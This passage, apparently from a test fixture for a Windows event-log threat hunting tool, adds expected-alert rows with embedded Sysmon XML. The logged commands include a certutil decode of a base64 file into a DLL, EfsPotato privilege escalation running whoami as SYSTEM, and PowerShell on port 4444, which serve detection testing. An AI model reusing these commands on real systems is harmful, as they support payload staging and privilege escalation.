+    <Data Name=""LogonGuid"">00247C92-7087-6122-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=1915FBFDB73FDD200C47880247ACDDE5442431A9,MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">00247C92-A691-6122-0000-001021C31F02</Data>
+    <Data Name=""ParentProcessId"">14048</Data>
+    <Data Name=""ParentImage"">C:\temp\EfsPotato.exe</Data>
+    <Data Name=""ParentCommandLine"">c:\temp\EfsPotato.exe  whoami</Data>
+  </EventData>
+</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435978.711831,2019-07-30T01:32:58.711831+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c certutil -f -decode fi.b64 AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:32:58.659405Z"">
+    </TimeCreated>
+    <EventRecordID>4888</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:32:58.614</Data>
+    <Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
+    <Data Name=""ProcessId"">3184</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557495209.424885,2019-05-10T17:33:29.424885+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-10T13:32:58.549885Z"">
+    </TimeCreated>
+    <EventRecordID>15677</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1980"" ThreadID=""1948"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-10 13:32:54.034</Data>
+    <Data Name=""ProcessGuid"">365ABB72-7D86-5CD5-0000-0010CC2E1400</Data>
+    <Data Name=""ProcessId"">2076</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;c:\Windows\System32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-79DF-5CD5-0000-0020F8410100</Data>
+    <Data Name=""LogonId"">0x141f8</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-7D85-5CD5-0000-001047061400</Data>
+    <Data Name=""ParentProcessId"">2536</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\CompMgmtLauncher.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\CompMgmtLauncher.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1561018078.816185,2019-06-20T12:07:58.816185+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-20T08:07:52.956810Z"">
+    </TimeCreated>
+    <EventRecordID>8119</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2020"" ThreadID=""2088"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-20 08:07:52.956</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3ED8-5D0B-0000-0010398F1A00</Data>
+    <Data Name=""ProcessId"">1476</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-3991-5D0B-0000-002029350100</Data>
+    <Data Name=""LogonId"">0x13529</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3ED4-5D0B-0000-0010B2871A00</Data>
+    <Data Name=""ParentProcessId"">1440</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;cmd&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot;  /groups) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T02:32:48.290682Z"">
+    </TimeCreated>
+    <EventRecordID>17715</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2024"" ThreadID=""2004"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 02:32:48.290</Data>
+    <Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-00103A6B1300</Data>
+    <Data Name=""ProcessId"">2676</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;  /groups</Data>
+    <Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
+    <Data Name=""LogonId"">0x13587</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
+    <Data Name=""ParentProcessId"">2016</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot;  /groups ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-14T02:32:48.290682Z"">
+    </TimeCreated>
+    <EventRecordID>17715</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2024"" ThreadID=""2004"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-14 02:32:48.290</Data>
+    <Data Name=""ProcessGuid"">365ABB72-28D0-5CDA-0000-00103A6B1300</Data>
+    <Data Name=""ProcessId"">2676</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot;  /groups</Data>
+    <Data Name=""CurrentDirectory"">C:\temp\PowerShell-Suite-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002087350100</Data>
+    <Data Name=""LogonId"">0x13587</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-28A0-5CDA-0000-001074181300</Data>
+    <Data Name=""ParentProcessId"">2016</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564435978.659405,2019-07-30T01:32:58.659405+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:32:57.633157Z"">
+    </TimeCreated>
+    <EventRecordID>4887</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:32:57.600</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ProcessId"">1208</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6056-5D3F-0000-0010C9EF4100</Data>
+    <Data Name=""ParentProcessId"">4600</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-12T13:06:08.143703Z"">
+    </TimeCreated>
+    <EventRecordID>342417</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3344"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-12 13:06:08.141</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E940-5F33-0000-001039310F00</Data>
+    <Data Name=""ProcessId"">7460</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">whoami.exe</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E93C-5F33-0000-0010A6F00E00</Data>
+    <Data Name=""ParentProcessId"">8032</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1561018072.95681,2019-06-20T12:07:52.956810+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname (  ) , IP ( 10.0.2.18 ) and port ( 38208 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-06-20T08:07:50.378685Z"">
+    </TimeCreated>
+    <EventRecordID>8118</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2020"" ThreadID=""2092"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-06-20 08:07:48.721</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D05-5D0B-0000-001004220D00</Data>
+    <Data Name=""ProcessId"">816</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">false</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.13</Data>
+    <Data Name=""SourceHostname"">IEWIN7</Data>
+    <Data Name=""SourcePort"">4444</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">10.0.2.18</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">38208</Data>
+    <Data Name=""DestinationPortName""></Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1590282859.005259,2020-05-24T05:14:19.005259+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-24T01:13:54.120170Z"">
+    </TimeCreated>
+    <EventRecordID>196375</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2812"" ThreadID=""3656"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-24 01:13:54.117</Data>
+    <Data Name=""ProcessGuid"">747F3D96-CA52-5EC9-0000-001027FA3700</Data>
+    <Data Name=""ProcessId"">4456</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">whoami.exe</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-BDD1-5EC9-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-CA4E-5EC9-0000-00109FE23700</Data>
+    <Data Name=""ParentProcessId"">1516</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">c:\Windows\System32\cmd.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564903596.239723,2019-08-04T11:26:36.239723+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-04T07:26:35.182896Z"">
+    </TimeCreated>
+    <EventRecordID>5637</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-04 07:26:35.116</Data>
+    <Data Name=""ProcessGuid"">747F3D96-88AB-5D46-0000-001081ED7D03</Data>
+    <Data Name=""ProcessId"">4300</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-88AA-5D46-0000-001093E37D03</Data>
+    <Data Name=""ParentProcessId"">4644</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\dllhost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot;) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
